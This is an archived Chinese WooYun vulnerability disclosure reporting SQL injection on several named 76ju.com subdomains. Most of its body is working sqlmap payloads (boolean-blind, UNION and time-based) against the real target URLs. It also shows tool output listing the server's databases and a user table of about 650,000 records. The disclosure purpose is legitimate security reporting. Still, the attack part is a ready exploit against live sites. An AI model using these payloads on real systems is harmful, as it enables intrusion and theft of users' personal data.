乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-13: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-27: 厂商已经主动忽略漏洞,细节向公众公开
齐乐聚所有分站存在sql注入漏洞可泄漏65万用户信息
http://rxhzw.76ju.com/?action=detail&id=4680http://xyfm.76ju.com/?action=detail&id=4422http://wssb.76ju.com/?action=detail&id=2966所有分站都存在该sql注入
Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=detail&id=4680) AND 3491=3491 AND (1677=1677 Type: UNION query Title: MySQL UNION query (NULL) - 20 columns Payload: action=detail&id=-9881) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716d6c7771,0x6d6d4d696d6e67794559,0x716c736471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: action=detail&id=4680) AND SLEEP(5) AND (7534=7534---[22:56:05] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5.0.11[22:56:05] [INFO] fetching database names[22:56:06] [INFO] the SQL query used returns 11 entries[22:56:06] [INFO] retrieved: "information_schema"[22:56:06] [INFO] retrieved: "76ju"[22:56:07] [INFO] retrieved: "76jutest"[22:56:07] [INFO] retrieved: "79yo"[22:56:07] [INFO] retrieved: "iy6v1"[22:56:07] [INFO] retrieved: "mysql"[22:56:08] [INFO] retrieved: "performance_schema"[22:56:08] [INFO] retrieved: "qq990"[22:56:08] [INFO] retrieved: "qq990test"[22:56:08] [INFO] retrieved: "qq990test1"[22:56:09] [INFO] retrieved: "test"available databases [11]: [*] 76ju[*] 76jutest[*] 79yo[*] information_schema[*] iy6v1[*] mysql[*] performance_schema[*] qq990[*] qq990test[*] qq990test1[*] test
Database: 76ju+----------+---------+| Table | Entries |+----------+---------+| pre_user | 650856 |+----------+---------+
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)